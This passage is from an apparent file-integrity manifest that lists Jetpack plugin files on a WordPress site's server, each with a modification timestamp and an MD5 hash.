4adbc676b232544917961870995\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_CL.json\":{\"d\":1544704135,\"h\":\"e9f89607abf4d474d3d4541cb747f265\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-fi.json\":{\"d\":1544704135,\"h\":\"738ff1e2aae13a3063a06796bb64ea77\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-zh_HK.json\":{\"d\":1544704135,\"h\":\"4b5b02a72c2fd72731c31d88c0e72c63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ka_GE.json\":{\"d\":1544704135,\"h\":\"3ba4213c65857c93bb20df9af0eb304f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-te.json\":{\"d\":1544704135,\"h\":\"7c0135fd3a2ea80af2a99dfdcdef0bbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-af.json\":{\"d\":1544704135,\"h\":\"6d6463296f633e86a0d753045c38bad7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-pl_PL.json\":{\"d\":1544704135,\"h\":\"641d97e6c1f823e8e1d3c9a89b12b969\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-si_LK.json\":{\"d\":1544704135,\"h\":\"703d49367d2200568394dfef766d5ff0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ca.json\":{\"d\":1544704135,\"h\":\"a47765aa213b93f5afe5e8c91ba095a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-cy.json\":{\"d\":1544704135,\"h\":\"ac586bb670ec0975501fbe9dae59f12c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-pt_PT.json\":{\"d\":1544704135,\"h\":\"d9c8605d0136b7508a4578c16164cd26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-en_AU.json\":{\"d\":1544704135,\"h\":\"9a8538e8e8468b32aa76d32d433ca28d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-it_IT.json\":{\"d\":1544704135,\"h\":\"a12a83605e11fe9494be3becfaf184ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sl_SI.json\":{\"d\":1544704135,\"h\":\"769b78e351e5269205cc80bd0100a9d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-en_CA.json\":{\"d\":1544704135,\"h\":\"6024e106b13c7fed0865bdba1274c43a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ko_KR.json\":{\"d\":1544704135,\"h\":\"d43dad3d1f8209494a2371b7009398ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-fr_BE.json\":{\"d\":1544704135,\"h\":\"4fd5b75cbebb6c05a89f6ae377ab061c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-de_DE_formal.json\":{\"d\":1544704135,\"h\":\"e84f157132090cfe8996efc11f6d3d40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_AR.json\":{\"d\":1544704135,\"h\":\"b8fc0863e3a0bb3a6d3f438953fb2b83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-gd.json\":{\"d\":1544704135,\"h\":\"6cdeee3767736b8f49f6d9399ad5018d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_VE.json\":{\"d\":1544704135,\"h\":\"621303a18c17cd24d37202805cba621f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ur.json\":{\"d\":1544704135,\"h\":\"2929170c9817538cfff84b17a0342b90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sq.json\":{\"d\":1544704135,\"h\":\"ebd26521debfc6da6bf99c4c419c8cf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-tr_TR.json\":{\"d\":1544704135,\"h\":\"e9b53c38e2adf2711a8f8f4b275109b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-hr.json\":{\"d\":1544704135,\"h\":\"f9f55bc57dba38b6c36965630417a213\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sr_RS.json\":{\"d\":1544704135,\"h\":\"9a8015700dce466675112e5ebc958331\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-lv.json\":{\"d\":1544704135,\"h\":\"8567fbea3cf45059b3d091b5052eda82\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_MX.json\":{\"d\":1544704135,\"h\":\"bd8c634de6b9721cb2d7e998a4a9ae35\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-de_DE.json\":{\"d\":1544704135,\"h\":\"b79c5b87779ded57989b25de5b821fea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-bs_BA.json\":{\"d\":1544704135,\"h\":\"db222357289d449e0f42fa5111f82fd0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-bg_BG.json\":{\"d\":1544704135,\"h\":\"6f80958a062ceddf58bb0a4af0b0c569\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-en_ZA.json\":{\"d\":1544704135,\"h\":\"519a4ea41d45c2cc0b278fbaec0378b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-my_MM.json\":{\"d\":1544704135,\"h\":\"beef357331861fb3a722f8f2cb6bfe86\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-vi.json\":{\"d\":1544704135,\"h\":\"5dd283f68374898a0b71b3bb065c6c9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-da_DK.json\":{\"d\":1544704135,\"h\":\"6741a84b9b34f518d84b37adf98883a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-en_NZ.json\":{\"d\":1544704135,\"h\":\"4cb1ffacb7240b086f6c3627fdf9ad8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-nb_NO.json\":{\"d\":1544704135,\"h\":\"8c83be17eb76fc12781a079e949b9cb4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sv_SE.json\":{\"d\":1544704135,\"h\":\"4956170898dcf8fa0b15d170ba9f49c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ja.json\":{\"d\":1544704135,\"h\":\"c273985ea726ad038aac40a540083f93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-cs_CZ.json\":{\"d\":1544704135,\"h\":\"63b5db7e473052ef5d9b4295d61ac6ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-eo.json\":{\"d\":1544704135,\"h\":\"5982ae10db099dc70d05b08eb42e9ebb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-pt_BR.json\":{\"d\":1544704135,\"h\":\"988f09e54dd8a91764ef7c852a270da3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ru_RU.json\":{\"d\":1544704135,\"h\":\"33bd8d786fbf989d6b3b24bb5f9c162e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ary.json\":{\"d\":1544704135,\"h\":\"0358794bd9d5fbcb985ed46c7c538678\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-fr_FR.json\":{\"d\":1544704135,\"h\":\"92353c768bd77fef49a4511f1ff5874f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-gl_ES.json\":{\"d\":1544704135,\"h\":\"dfdcc0b06d65e3b5b4e5fd51812b9e0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-is_IS.json\":{\"d\":1544704135,\"h\":\"6c0468b374bf2b1cf1206cede54185aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-id_ID.json\":{\"d\":1544704135,\"h\":\"85fa06d2fa203dfcdadbf7a7f487b7b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_ES.json\":{\"d\":1544704135,\"h\":\"4efa99a8325703e965b5661cb9095fa0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-az.json\":{\"d\":1544704135,\"h\":\"dee71ee3043a0af40643cdd18cbcaa93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-he_IL.json\":{\"d\":1544704135,\"h\":\"da7a50189cbd99490719cbfb5b84f6db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sa_IN.json\":{\"d\":1544704135,\"h\":\"28cf862c70c87a2f8eabd1600d7aab16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ar.json\":{\"d\":1544704135,\"h\":\"36acb2473b1521b3e6311003641047dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-zh_CN.json\":{\"d\":1544704135,\"h\":\"2e58d15304eefc9a2c6032e426eb6576\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/languages\\/readme.txt\":{\"d\":1544704139,\"h\":\"502d5fcc18ed2c04176603dc616d2254\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-functions.php\":{\"d\":1544704139,\"h\":\"581e7b98ffd29b7c76bf955e387f48ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-callables.php\":{\"d\":1544704139,\"h\":\"d43ba8d33755a7db5825ff6e23b1ad63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-wp-replicastore.php\":{\"d\":1544704139,\"h\":\"c523ff12675e27a13d4d50a84701869e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-terms.php\":{\"d\":1544704139,\"h\":\"de60d6cafbd7fc137d3ba924d93bd177\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-network-options.php\":{\"d\":1544704139,\"h\":\"b11c11703ad326042b3c213c06ff8755\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-users.php\":{\"d\":1544704139,\"h\":\"178de6e0654a2a7e797f21e4dcb581c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-protect.php\":{\"d\":1544704139,\"h\":\"90f2fb399db8bce7ddf8c16908fdd6f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-stats.php\":{\"d\":1544704139,\"h\":\"cd8fe1a8844bbb194ddff1de0f72c914\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-updates.php\":{\"d\":1544704139,\"h\":\"8619d18ebfd92d2a069f4c797dd3ca6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-queue.php\":{\"d\":1544704139,\"h\":\"fa8c14d2f23d495385a62f198a495a9f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-meta.php\":{\"d\":1544704139,\"h\":\"9e402943785174f35bc58f587af206f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-wp-super-cache.php\":{\"d\":1544704139,\"h\":\"567c7dc8574eb75c7c31c55b7cee25be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-themes.php\":{\"d\":1544704139,\"h\":\"1852d2684af3b9337d73d6e77b137636\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-constants.php\":{\"d\":1544704139,\"h\":\"b746479e89bf2dc0af76049833cc6f2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-json-deflate-array-codec.php\":{\"d\":1544704139,\"h\":\"ee2c79dfefa8a81ddd44ec4e21e6e632\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-import.php\":{\"d\":1544704139,\"h\":\"f0469cef757680fd3f179f0c7da2fe00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-listener.php\":{\"d\":1544704139,\"h\":\"1ff61c0f21a2894c234bd6aa3c6516d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/interface.jetpack-sync-replicastore.php\":{\"d\":1544704139,\"h\":\"4d30c21e862f781e42abaf7cb47f7cd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-defaults.php\":{\"d\":1544704139,\"h\":\"bfab6d7ae7dd73a366517bf516d12a6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-comments.php\":{\"d\":1544704139,\"h\":\"fd430867c4e406fe2734d3dcd657f2fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-actions.php\":{\"d\":1544704139,\"h\":\"da390890d2f2af98ffef1bbe9bd048e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-server.php\":{\"d\":1544704139,\"h\":\"cdb7d7e9328096dfe590994ce42990b6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-options.php\":{\"d\":1544704139,\"h\":\"fe25f65cf1f1acf3e13af3719ed32b56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-sender.php\":{\"d\":1544704139,\"h\":\"123bd67dbc1f3e8c0f0ddd693ad06a59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-users.php\":{\"d\":1544704139,\"h\":\"6328d3790f76300bdaf702d7822261ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/interface.jetpack-sync-codec.php\":{\"d\":1544704139,\"h\":\"2b882bf9af9ee64cc54ba6a9cce5da82\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-full-sync.php\":{\"d\":1544704139,\"h\":\"d86ac26f972b9159a50ebdf78957f78c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-modules.php\":{\"d\":1544704139,\"h\":\"0f4bb2385dd6836ed1f0c496860e6ae9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-woocommerce.php\":{\"d\":1544704139,\"h\":\"84dfba1bad687cee88d4230d7f3f3b0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-plugins.php\":{\"d\":1544704139,\"h\":\"936b1db914a9358b9b3b46dc383c73d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-attachments.php\":{\"d\":1544704139,\"h\":\"635d48c8b936dae2a9f5ab25a3a24793\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-settings.php\":{\"d\":1544704139,\"h\":\"fb747760cf228cce2811fb80c7642799\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-posts.php\":{\"d\":1544704139,\"h\":\"06608c4fadb20fff025ed7779fb86237\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module.php\":{\"d\":1544704139,\"h\":\"291019efe515eb4a0e2c75cb38555bd2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-simple-codec.php\":{\"d\":1544704139,\"h\":\"a865180b189d76342ff690493f1420b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-menus.php\":{\"d\":1544704139,\"h\":\"d346c21a872585d642d4e0713dc96a8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/css\\/nova-font.css\":{\"d\":1544704139,\"h\":\"d450eaf93e3f43972789408468f55033\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/css\\/testimonial-shortcode.css\":{\"d\":1544704139,\"h\":\"9cecb4e1d04c652a8bdda1e128028fe9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/css\\/many-items.css\":{\"d\":1544704139,\"h\":\"75c2b7960466eae949128aebdd4bf4fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/css\\/edit-items.css\":{\"d\":1544704139,\"h\":\"3834cacfd8c2efd0d043f24d94d63d00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/css\\/portfolio-shortcode.css\":{\"d\":1544704139,\"h\":\"1e3e71552b41f7b74fe3690645604b4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/css\\/nova.css\":{\"d\":1544704139,\"h\":\"831011d20531170e7e5a99d7ecbf1ea9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/js\\/menu-checkboxes.js\":{\"d\":1544704139,\"h\":\"3c2881b146c7cbb867d4c378af50a217\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/js\\/many-items.js\":{\"d\":1544704139,\"h\":\"85e2af7f0d1b1f5e87e9f3e70b875e89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/js\\/nova-drag-drop.js\":{\"d\":1544704139,\"h\":\"29a33707cd122b2b4cb88140390e47c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/rtl\\/comics-rtl.css\":{\"d\":1544704139,\"h\":\"04df3e61d18f0d5b41bc64a6de5ad9ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/comics.css\":{\"d\":1544704139,\"h\":\"c1623d8420184377b3bb27de67ba48b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/comics-rtl.min.css\":{\"d\":1544704139,\"h\":\"f332f891ccbec20e80a25f223433f863\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/comics.js\":{\"d\":1544704139,\"h\":\"ed7881258889c630b2d3dacac08161a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/comics-rtl.css\":{\"d\":1544704139,\"h\":\"4c98d3b047339f9a1b080bbd6270e4aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/comics.min.css\":{\"d\":1544704139,\"h\":\"6df477231be9256e9b05fdfd1b9a2264\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics\\/admin.css\":{\"d\":1544704139,\"h\":\"9f201fd0012be940a2d3fb540d17a2b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/comics.php\":{\"d\":1544704139,\"h\":\"22a2652a8032aae36fc404e6a31dbf02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/portfolios.php\":{\"d\":1544704139,\"h\":\"6a0faf48ca105990cf6814bb418fcfab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/nova.php\":{\"d\":1544704139,\"h\":\"c3d56c970feffd5e6b1c304ab5d73def\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/custom-post-types\\/testimonial.php\":{\"d\":1544704139,\"h\":\"e190d362ccc1def5a6ce1b0b844d501b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentythirteen.css\":{\"d\":1544704139,\"h\":\"f5a92541d245075cbb3bdc6378ac807e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyseventeen.php\":{\"d\":1544704139,\"h\":\"3fef98b6b0d3192c042ff255480308d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyseventeen-rtl.css\":{\"d\":1544704139,\"h\":\"a2dbf1d04a9b7d1cc9ab08fd0970ca00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentytwelve.php\":{\"d\":1544704139,\"h\":\"feb3d5e700edd76d83c757f671f3fc40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyeleven.php\":{\"d\":1544704139,\"h\":\"eada0fabd37ceabe53a00b31dfc37897\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentythirteen.php\":{\"d\":1544704139,\"h\":\"a255dfde76c6327abc2b0aeb5b57edbd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyseventeen.css\":{\"d\":1544704139,\"h\":\"80bcf65e6ab29f047897ef55be806b21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyten.css\":{\"d\":1544704139,\"h\":\"b96b20806b5376f76dd5dce56760b8d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyfifteen.css\":{\"d\":1544704139,\"h\":\"c7f13244f480bb2a2d0ec38debbe6488\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentytwelve.css\":{\"d\":1544704139,\"h\":\"5f29e8e155e41429f12c74ea6b69fae8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentysixteen.css\":{\"d\":1544704139,\"h\":\"4b14dfb4f6f8f393d0fac7f02e41263c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyfourteen.php\":{\"d\":1544704139,\"h\":\"740e7a0b7b0542d54442a96bc09a0797\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyten.php\":{\"d\":1544704139,\"h\":\"d031ff93f6c73234c5b47cab6315a448\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyfourteen.css\":{\"d\":1544704139,\"h\":\"97a01e039d5ca0f764c9e38bd38e9d5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentysixteen.php\":{\"d\":1544